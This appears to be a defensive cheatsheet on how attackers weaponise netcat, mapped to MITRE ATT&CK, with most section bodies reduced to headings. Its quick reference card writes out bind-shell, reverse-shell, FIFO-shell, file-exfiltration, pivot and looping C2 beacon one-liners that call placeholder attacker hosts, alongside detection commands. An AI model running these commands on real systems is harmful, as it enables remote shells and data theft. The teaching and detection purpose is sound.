Netcat: Attack & Detection Techniques
Netcat Weaponisation: Attack Techniques & Detection Cheatsheet
Overview
Netcat (nc) is a versatile networking utility that reads and writes data across network connections. Its legitimate uses include debugging, port scanning, and file transfers—but attackers weaponise it for reconnaissance, reverse shells, data exfiltration, and lateral movement. This guide covers offensive techniques mapped to MITRE ATT&CK tactics and comprehensive detection strategies.
Learning Workflow
Phase 1: Foundations — Netcat variants, syntax, and capabilities Phase 2: Reconnaissance — Port scanning, banner grabbing, service enumeration Phase 3: Initial Access — Bind shells, reverse shells, payload delivery Phase 4: Execution — Command execution, script delivery, interactive shells Phase 5: Persistence — Backdoors, scheduled tasks, service creation Phase 6: Privilege Escalation — SUID exploitation, capability abuse Phase 7: Defense Evasion — Encrypted channels, obfuscation, living-off-the-land Phase 8: Credential Access — Credential harvesting, keylogging relay Phase 9: Discovery — Network mapping, service discovery Phase 10: Lateral Movement — Pivoting, proxying, relay attacks Phase 11: Collection — Data staging, clipboard capture Phase 12: Command & Control — C2 channels, beaconing Phase 13: Exfiltration — Data theft, covert channels
Phase 1: Netcat Foundations
Netcat Variants
nc (traditional)
Original BSD netcat
Basic functionality
nc.openbsd
OpenBSD version
No -e flag (security)
nc.traditional
GNU netcat
Includes -e for execution
ncat
Nmap's netcat
SSL/TLS, access control, proxy
socat
Advanced relay
Bidirectional, SSL, PTY
netcat
Generic name
Varies by distribution
busybox nc
Embedded systems
Minimal features
pwncat
Python-based
Persistence, privesc built-in
rustcat
Rust implementation
Modern, evasive
Core Syntax
Identifying Installed Variants
Phase 2: Reconnaissance Detection
Attack Techniques
Port Scanning
Banner Grabbing
Service Fingerprinting
Detection Strategies
Log Indicators
Network Detection
Host-Based Detection
Detection Script
Defensive Measures
Phase 3: Initial Access Detection
Attack Techniques
Bind Shell (Attacker Connects to Victim)
Reverse Shell (Victim Connects to Attacker)
Payload Delivery
Detection Strategies
Log Indicators
Network Detection
Process-Based Detection
Detection Script
Defensive Measures
Phase 4: Execution Detection
Attack Techniques
Remote Command Execution
Interactive Shell Upgrade
Staged Execution
Detection Strategies
Log Indicators
Process Detection
Network Detection
Detection Script
Phase 5: Persistence Detection
Attack Techniques
Cron-Based Persistence
Systemd Service Persistence
Init Script Persistence
Shell Profile Persistence
Binary Replacement Persistence
Detection Strategies
Log Indicators
File System Detection
Detection Script
Auditd Rules for Persistence
Phase 6: Privilege Escalation Detection
Attack Techniques
SUID Netcat Exploitation
Capability Abuse
Exploiting Privileged Processes
Sudo Misconfiguration Exploitation
Detection Strategies
Phase 7: Defense Evasion Detection
Attack Techniques
Process Name Obfuscation
Encrypted Channels
Traffic Obfuscation
Living Off The Land
Log Evasion
Detection Strategies
Obfuscation Detection
Encrypted Channel Detection
Detection Script
Phase 8: Credential Access Detection
Attack Techniques
Credential Harvesting Relay
Keylogger Relay
Password File Exfiltration
Memory Credential Dumping
Detection Strategies
Phase 9: Discovery Detection
Attack Techniques
Network Discovery
Internal Reconnaissance
Detection Strategies
Phase 10: Lateral Movement Detection
Attack Techniques
Pivoting Through Compromised Hosts
Port Forwarding
SOCKS Proxy Creation
File Transfer Laterally
Detection Strategies
Detection Script
Phase 11: Collection Detection
Attack Techniques
Data Staging
Clipboard Capture
Screen Capture
Archive Creation
Detection Strategies
Phase 12: Command & Control Detection
Attack Techniques
Basic C2 Channel
Resilient C2
Encrypted C2
Covert Channels
Detection Strategies
Beaconing Detection
C2 Traffic Analysis
Detection Script
Phase 13: Exfiltration Detection
Attack Techniques
Direct File Exfiltration
Compressed Exfiltration
Chunked Exfiltration
Scheduled Exfiltration
Covert Channel Exfiltration
Detection Strategies
Network Monitoring
File Access Monitoring
Detection Script
Additional Attack Types
Port Knocking with Netcat
Man-in-the-Middle with Netcat
UDP Attacks
Comprehensive Detection Script
Quick Reference Card
Common Attack Patterns
Bind Shell
nc -lvp 4444 -e /bin/bash
Listen on unusual ports
Reverse Shell
nc <attacker> 4444 -e /bin/bash
Outbound to unusual ports
FIFO Shell
mkfifo /tmp/f; cat /tmp/f|/bin/bash|nc <ip> 4444 >/tmp/f
Named pipes in /tmp
Port Scan
nc -zv <target> 1-1024
Rapid connection attempts
Banner Grab
nc -v <target> 80
Service enumeration patterns
File Exfil
cat file | nc <attacker> 4444
Large outbound transfers
Relay/Pivot
nc -lvp 8888 | nc <target> 22
Multi-socket processes
C2 Beacon
while true; do nc <c2> 4444 -e /bin/bash; sleep 300; done
Periodic connections
Detection Commands
Find nc processes
ps aux | grep -E '[n]c|[n]etcat|[n]cat'
Find listeners
ss -tunapl | grep LISTEN
Find named pipes
find /tmp -type p
Shell network conn
lsof -i | grep bash
Audit nc execution
ausearch -c nc
Process tree
pstree -p | grep nc
Deleted binaries
ls -la /proc/*/exe | grep deleted
Defensive Rules
Log Locations
/var/log/auth.log
Authentication, sudo
/var/log/syslog
System events
/var/log/audit/audit.log
Auditd events
/var/log/kern.log
Firewall, kernel
journalctl
Systemd logs
MITRE ATT&CK Mapping
Reconnaissance
T1046 Network Scanning
nc -zv port scanning
Initial Access
T1059 Command Execution
Reverse/bind shells
Execution
T1059.004 Unix Shell
-e /bin/bash
Persistence
T1053 Scheduled Task
Cron + nc reverse shell
Privilege Escalation
T1548 SUID Abuse
SUID nc binary
Defense Evasion
T1027 Obfuscation
Renamed binaries, SSL
Credential Access
T1003 Credential Dump
Exfil /etc/shadow
Discovery
T1018 Remote Discovery
Banner grabbing
Lateral Movement
T1090 Proxy
Relay/pivot chains
Collection
T1560 Archive
tar + nc exfil
Command & Control
T1571 Non-Standard Port
C2 on 4444, etc.
Exfiltration
T1048 Exfil Over C2
Direct file transfer
Last updated